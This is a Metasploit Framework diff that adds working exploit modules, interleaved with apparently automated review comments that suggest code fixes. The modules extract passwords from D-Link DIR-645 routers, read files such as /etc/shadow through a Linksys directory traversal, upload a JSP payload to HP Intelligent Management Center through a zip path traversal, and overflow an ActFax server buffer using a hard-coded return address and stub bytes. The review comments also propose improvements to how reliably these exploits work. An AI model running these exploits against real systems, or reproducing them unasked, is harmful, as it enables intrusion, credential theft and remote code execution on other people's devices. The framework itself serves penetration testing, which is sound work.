diff --git a/data/wordlists/sensitive_files.txt b/data/wordlists/sensitive_files.txt
index 5bc6e2a962..79db3e9f44 100755
--- a/data/wordlists/sensitive_files.txt
+++ b/data/wordlists/sensitive_files.txt
@@ -1,4 +1,5 @@
 /etc/passwd
+/etc/shadow
 /etc/groups
 /etc/mysql.conf
 /etc/mysql/my.cnf
@@ -10,4 +11,5 @@
 /etc/motd
 /etc/fstab
 /etc/inetd.conf
-/etc/xinetd.conf
\ No newline at end of file
+/etc/xinetd.conf
+/proc/version
diff --git a/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb b/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb
new file mode 100644
index 0000000000..0f98f7352d
--- /dev/null
+++ b/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb
@@ -0,0 +1,95 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + + def initialize + super( + 'Name' => 'DLink DIR 645 Password Extractor', + 'Description' => %q{ + This module exploits an authentication bypass vulnerability in DIR 645 < v1.03. + With this vulnerability you are able to extract the password for the remote + management. + }, + 'References' => + [ + [ 'OSVDB', '90733' ], + [ 'BID', '58231' ], + [ 'URL', 'http://packetstormsecurity.com/files/120591/dlinkdir645-bypass.txt' ] + ], + 'Author' => + [ + 'Roberto Paleari ', # Vulnerability discovery + 'Michael Messner ' # Metasploit module + ], + 'License' => MSF_LICENSE + ) + end + + def run + + vprint_status("#{rhost}:#{rport} - Trying to access the configuration of the device") + + #Curl request: + #curl -d SERVICES=DEVICE.ACCOUNT http://192.168.178.200/getcfg.php | egrep "\ '/getcfg.php', + 'method' => 'POST', + 'vars_post' => + { + 'SERVICES' => 'DEVICE.ACCOUNT' + } + }) + + return if res.nil? + return if (res.headers['Server'].nil? 
or res.headers['Server'] !~ /DIR-645 Ver 1.0/) + return if (res.code == 404) + + if res.body =~ /(.*)<\/password>/ + print_good("#{rhost}:#{rport} - credentials successfully extracted") + + #store all details as loot -> there is some usefull stuff in the response + loot = store_loot("dlink.dir645.config","text/plain",rhost, res.body) + print_good("#{rhost}:#{rport} - Account details downloaded to: #{loot}") + + res.body.each_line do |line| + if line =~ /(.*)<\/name>/ + @user = $1 + next + end + if line =~ /(.*)<\/password>/ + pass = $1 + vprint_good("user: #{@user}") + vprint_good("pass: #{pass}") + + report_auth_info( + :host => rhost, + :port => rport, + :sname => 'http', + :user => @user, + :pass => pass, + :active => true + ) + end + end + end + rescue ::Rex::ConnectionError + vprint_error("#{rhost}:#{rport} - Failed to connect to the web server") + return + end + + + end +end diff --git a/modules/auxiliary/scanner/http/linksys_e1500_traversal.rb b/modules/auxiliary/scanner/http/linksys_e1500_traversal.rb new file mode 100644 index 0000000000..4b8801578e --- /dev/null +++ b/modules/auxiliary/scanner/http/linksys_e1500_traversal.rb 
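Review bot: `@user` in the `each_line` loop of `run` is an instance variable, so it outlives the loop and the run: if a password element is seen before any name element, or the module is run again against another host, the name from the previous iteration or previous target is paired with the new password in `report_auth_info`. A local declared before the loop and assigned from the match (`user = nil` before `res.body.each_line`, then `user = Regexp.last_match(1)` and `:user => user`) keeps the pairing per response and also avoids the cryptic `$1`. The Server-header gate `/DIR-645 Ver 1.0/` also accepts `Ver 1.03`, which the description lists as the fixed version; that only costs one request since reporting is still gated on the password match, but anchoring the version would make the fingerprint match the description. The `begin` that pairs with `rescue ::Rex::ConnectionError` is not visible in this extract (the regexes' opening tags appear to have been lost in extraction too), so I cannot tell where the protected region starts.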
@@ -0,0 +1,129 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Scanner + + def initialize + super( + 'Name' => 'Linksys E1500 Directory Traversal Vulnerability', + 'Description' => %q{ + This module exploits a directory traversal vulnerability which is present in + different Linksys home routers, like the E1500. + }, + 'References' => + [ + [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-004' ], + [ 'URL', 'http://homekb.cisco.com/Cisco2/ukp.aspx?pid=80&app=vw&vw=1&login=1&json=1&docid=d7d0a87be9864e20bc347a73f194411f_KB_EN_v1.xml' ], + [ 'BID', '57760' ], + [ 'OSVDB', '89911' ], + [ 'EDB', '24475' ] + ], + 'Author' => [ 'm-1-k-3' ], + 'License' => MSF_LICENSE + ) + + register_options( + [ + OptPath.new('SENSITIVE_FILES', [ true, "File containing senstive files, one per line", + File.join(Msf::Config.install_root, "data", "wordlists", "sensitive_files.txt") ]), + OptString.new('USERNAME',[ true, 'User to login with', 'admin']), + OptString.new('PASSWORD',[ true, 'Password to login with', 'password']), + + ], self.class) + end + + def extract_words(wordfile) + return [] unless wordfile && File.readable?(wordfile) + begin + words = File.open(wordfile, "rb") do |f| + f.read + end + rescue + return [] + end + save_array = words.split(/\r?\n/) + return save_array + end + + def find_files(file,user,pass) + uri = "/apply.cgi" + traversal = '../..' 
+ data_trav = "submit_type=wsc_method2&change_action=gozila_cgi&next_page=" << traversal << file + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => uri, + 'authorization' => basic_auth(user,pass), + 'vars_post' => { + "submit_type" => "wsc_method2", + "change_action" => "gozila_cgi", + "next_page" => traversal << file + } + }) + + #without res.body.length we get lots of false positives + if (res and res.code == 200 and res.body.length > 0) + print_good("#{rhost}:#{rport} - Request may have succeeded on file #{file}") + report_web_vuln({ + :host => rhost, + :port => rport, + :vhost => datastore['VHOST'], + :path => uri, + :pname => data_trav, + :risk => 3, + :proof => data_trav, + :name => self.fullname, + :category => "web", + :method => "POST" + }) + + loot = store_loot("linksys.traversal.data","text/plain", rhost, res.body, file) + vprint_good("#{rhost}:#{rport} - File #{file} downloaded to: #{loot}") + elsif (res and res.code) + vprint_error("#{rhost}:#{rport} - Attempt returned HTTP error #{res.code} when trying to access #{file}") + end + end + + def run_host(ip) + user = datastore['USERNAME'] + pass = datastore['PASSWORD'] + + vprint_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}") + + #test login + begin + res = send_request_cgi({ + 'uri' => '/', + 'method' => 'GET', + 'authorization' => basic_auth(user,pass) + }) + + return if res.nil? + return if (res.headers['Server'].nil? or res.headers['Server'] !~ /httpd/) + return if (res.code == 404) + + if [200, 301, 302].include?(res.code) + vprint_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}") + else + vprint_error("#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}") + return + end + + rescue ::Rex::ConnectionError + vprint_error("#{rhost}:#{rport} - Failed to connect to the web server") + return + end + + extract_words(datastore['SENSITIVE_FILES']).each do |file| + find_files(file, user, pass) unless file.empty? + end + end +end 
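Review bot: In `find_files`, the hash value `"next_page" => traversal << file` appends to the `traversal` local as a side effect of building the request, which differs from how `data_trav` was built two lines earlier and is easy to misread; `"next_page" => "#{traversal}#{file}"` expresses the same value without mutating the local. `:pname` in `report_web_vuln` is given the whole encoded POST body (`data_trav`) instead of the parameter that carries the traversal, so the stored finding names the wrong parameter; `:pname => "next_page"` is what the field is for, with `data_trav` staying in `:proof`. The success test `res.code == 200 and res.body.length > 0` reports a vulnerability and stores loot for any non-empty 200, as the comment above it concedes, so a finding recorded by this module needs manual confirmation; at minimum `print_good` should say so. `extract_words` also hides every read error behind a bare `rescue`; with the `File.readable?` guard already in place, `File.binread(wordfile)` and a `rescue SystemCallError` would be both shorter and more honest.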
diff --git a/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb b/modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb similarity index 99% rename from modules/auxiliary/admin/http/netgear_sph200d_traversal.rb rename to modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb index 909afe5443..e7131b9306 100644 --- a/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb +++ b/modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb @@ -31,7 +31,6 @@ class Metasploit3 < Msf::Auxiliary ) register_options( [ - Opt::RPORT(80), OptPath.new('FILELIST', [ true, "File containing sensitive files, one per line", File.join(Msf::Config.install_root, "data", "wordlists", "sensitive_files.txt") ]), OptString.new('USERNAME',[ true, 'User to login with', 'admin']), diff --git a/modules/auxiliary/scanner/http/tomcat_enum.rb b/modules/auxiliary/scanner/http/tomcat_enum.rb index 00204eb184..40ddbfb8d7 100644 --- a/modules/auxiliary/scanner/http/tomcat_enum.rb +++ b/modules/auxiliary/scanner/http/tomcat_enum.rb @@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary File.join(Msf::Config.install_root, "data", "wordlists", "tomcat_mgr_default_users.txt") ]), ], self.class) - deregister_options('PASSWORD','PASS_FILE','USERPASS_FILE','STOP_ON_SUCCESS','BLANK_PASSWORDS','USERNAME') + deregister_options('PASSWORD','PASS_FILE','USERPASS_FILE','USER_AS_PASS','STOP_ON_SUCCESS','BLANK_PASSWORDS','USERNAME') end def target_url @@ -99,8 +99,9 @@ class Metasploit3 < Msf::Auxiliary return :abort end - rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - rescue ::Timeout::Error, ::Errno::EPIPE + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE + print_error("#{target_url} - UNREACHABLE") + return :abort end end diff --git a/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb b/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb index 930590bfbb..07022ba8e5 100644 
--- a/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb +++ b/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb @@ -176,13 +176,12 @@ class Metasploit3 < Msf::Exploit::Remote # # "/test.mp4" is currently hard-coded in the swf file, so we need to add to resource - # + # proc = Proc.new do |cli, req| + self.add_resource({'Path' => "/test.mp4", 'Proc' => proc}) rescue nil on_request_uri(cli, req) end - self.add_resource({'Path'=>'/test.mp4', 'Proc'=>proc})# rescue nil - end def on_request_uri(cli, request) diff --git a/modules/exploits/windows/http/hp_imc_mibfileupload.rb b/modules/exploits/windows/http/hp_imc_mibfileupload.rb new file mode 100644 index 0000000000..8d44ad8ee9 --- /dev/null +++ b/modules/exploits/windows/http/hp_imc_mibfileupload.rb 
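Review bot: After this hunk the only registration of `/test.mp4` visible is the `self.add_resource(...)` call inside the `proc` that is meant to serve it, so unless code outside the hunk registers `proc` as a resource (the enclosing method starts before the hunk), the handler is never installed and the SWF's request for `/test.mp4` goes unanswered. If the intent is only to tolerate re-registration, the outer call `self.add_resource({'Path' => "/test.mp4", 'Proc' => proc})` should remain after the `Proc.new` block and the copy inside the block should go. The removed line had its rescue commented out (`# rescue nil`) whereas the added line makes `rescue nil` live, so a failed registration is now silent; at least a `vprint_error` in that rescue path would keep the failure diagnosable.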
@@ -0,0 +1,115 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = GreatRanking + + HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'HP Intelligent Management Center Arbitrary File Upload', + 'Description' => %q{ + This module exploits a code execution flaw in HP Intelligent Management Center. + The vulnerability exists in the mibFileUpload which is accepting unauthenticated + file uploads and handling zip contents in a insecure way. Combining both weaknesses + a remote attacker can accomplish arbitrary file upload. This module has been tested + successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2. 
+ }, + 'Author' => + [ + 'rgod ', # Vulnerability Discovery + 'juan vazquez' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2012-5201' ], + [ 'OSVDB', '91026' ], + [ 'BID', '58385' ], + [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-050/' ], + [ 'URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03689276' ] + ], + 'Privileged' => true, + 'Platform' => 'win', + 'Arch' => ARCH_JAVA, + 'Targets' => + [ + [ 'HP Intelligent Management Center 5.1 E0202 / Windows', { } ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Mar 07 2013')) + + register_options( + [ + Opt::RPORT(8080), + OptString.new('TARGETURI', [true, 'Path to HP Intelligent Management Center', '/imc']) + ], self.class) + end + + def check + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path.to_s, "login.jsf"), + 'method' => 'GET' + }) + + if res and res.code == 200 and res.body =~ /HP Intelligent Management Center/ + return Exploit::CheckCode::Detected + end + + return Exploit::CheckCode::Safe + end + + def exploit + @peer = "#{rhost}:#{rport}" + + # New lines are handled on the vuln app and payload is corrupted + jsp = payload.encoded.gsub(/\x0d\x0a/, "").gsub(/\x0a/, "") + jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp" + + # Zipping with CM_STORE to avoid errors while zip decompressing + # on the Java vulnerable application + zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE) + zip.add_file("../../../../../../../ROOT/#{jsp_name}", jsp) + + post_data = Rex::MIME::Message.new + post_data.add_part(zip.pack, "application/octet-stream", nil, "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{Rex::Text.rand_text_alpha(4+rand(4))}.zip\"") + + # Work around an incompatible MIME implementation + data = post_data.to_s + data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part") + + print_status("#{@peer} - Uploading the JSP payload...") + res = send_request_cgi({ + 'uri' => 
normalize_uri(target_uri.path.to_s, "webdm", "mibbrowser", "mibFileUpload"), + 'method' => 'POST', + 'data' => data, + 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", + 'cookie' => "JSESSIONID=#{Rex::Text.rand_text_hex(32)}" + }) + + if res and res.code == 200 and res.body.empty? + print_status("#{@peer} - JSP payload uploaded successfully") + register_files_for_cleanup(jsp_name) + else + fail_with(Exploit::Failure::Unknown, "#{@peer} - JSP payload upload failed") + end + + print_status("#{@peer} - Executing payload...") + send_request_cgi({ + 'uri' => normalize_uri(jsp_name), + 'method' => 'GET' + }) + + end + +end diff --git a/modules/exploits/windows/misc/actfax_raw_server_bof.rb b/modules/exploits/windows/misc/actfax_raw_server_bof.rb new file mode 100644 index 0000000000..6638f30c7d --- /dev/null +++ b/modules/exploits/windows/misc/actfax_raw_server_bof.rb 
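Review bot: `register_files_for_cleanup(jsp_name)` in `exploit` records only the bare file name, while the payload is written through the zip entry `../../../../../../../ROOT/#{jsp_name}`, i.e. into the container's ROOT web application; FileDropper presumably issues the delete with the path it is given, relative to the session's working directory, so the uploaded JSP is likely left on the target after cleanup. Recording the path the zip entry actually resolves to (confirm against the 5.1 E0202 setup named in the description) would make the cleanup effective. The final `send_request_cgi` that triggers the JSP discards its response, so a 404 or 500 there (for instance if the container has not yet picked up the new file) yields no diagnostic; capturing `res` and printing `res.code` when it is not 200 would help triage. The check for a successful upload, `res.code == 200 and res.body.empty?`, is inferred rather than documented, so a short comment stating that the vulnerable endpoint answers an accepted upload with an empty 200 would save the next reader the same guess.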
@@ -0,0 +1,82 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + + Rank = NormalRanking + + include Msf::Exploit::Remote::Tcp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'ActFax 5.01 RAW Server Buffer Overflow', + 'Description' => %q{ + This module exploits a vulnerability in ActFax Server 5.01 RAW server. The RAW + Server can be used to transfer fax messages without any underlying protocols. To + note significant fields in the fax being transferred, like the fax number or the + recipient, ActFax data fields can be used. This module exploits a buffer overflow + in the handling of the @F506 fields due to the insecure usage of strcpy. This + module has been tested successfully on ActFax 5.01 over Windows XP SP3 (English). 
+ }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Craig Freyman', # @cd1zz # discovery and Metasploit module + 'corelanc0d3r', # Metasploit module + 'juan vazquez' # Metasploit module cleanup + ], + 'References' => + [ + [ 'OSVDB', '89944' ], + [ 'BID', '57789' ], + [ 'EDB', '24467' ], + [ 'URL', 'http://www.pwnag3.com/2013/02/actfax-raw-server-exploit.html' ] + ], + 'Platform' => 'win', + 'Payload' => + { + 'BadChars' => (0x00..0x1f).to_a.pack("C*") + "\x40", + 'DisableNops' => true, + 'Space' => 1024, + 'EncoderOptions' => + { + 'BufferRegister' => 'ECX' + } + }, + 'Targets' => + [ + [ 'ActFax 5.01 / Windows XP SP3', + { + 'Ret' => 0x77c35459, # push esp # ret # msvcrt.dll + 'Offset' => 1024 + } + ], + ], + 'Privileged' => false, + 'DisclosureDate' => 'Feb 5 2013', + 'DefaultTarget' => 0)) + + end + + def exploit + connect + p = payload.encoded + buffer = p + buffer << rand_text(target['Offset'] - p.length) + buffer << [target.ret].pack("V") + buffer << "\x89\xe1" # mov ecx, esp + buffer << "\x81\xC1\xFC\xFB\xFF\xFF" # add ecx, -1028 + buffer << "\x81\xC4\x6C\xEE\xFF\xFF" # add esp, -4500 + buffer << "\xE9\xE9\xFB\xFF\xFF" # jmp $-1042 + print_status("Trying target #{target.name}...") + sock.put("@F506 "+buffer+"@\r\n\r\n") + disconnect + end +end +
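Review bot: In `exploit`, `buffer = p` aliases the String returned by `payload.encoded`, and every following `buffer << ...` mutates that same object; if `payload.encoded` hands back a cached string, the return address and the stub bytes are appended to the payload itself and any later use of `payload.encoded` sees the corrupted value. `buffer = p.dup` (or `buffer = ''` followed by `buffer << p`) removes the aliasing with no other change. The `"@F506 "+buffer+"@\r\n\r\n"` concatenation reads better as `"@F506 #{buffer}@\r\n\r\n"`, and `disconnect` is skipped whenever `sock.put` raises, so wrapping the send in `begin ... ensure disconnect end` guarantees the socket is released.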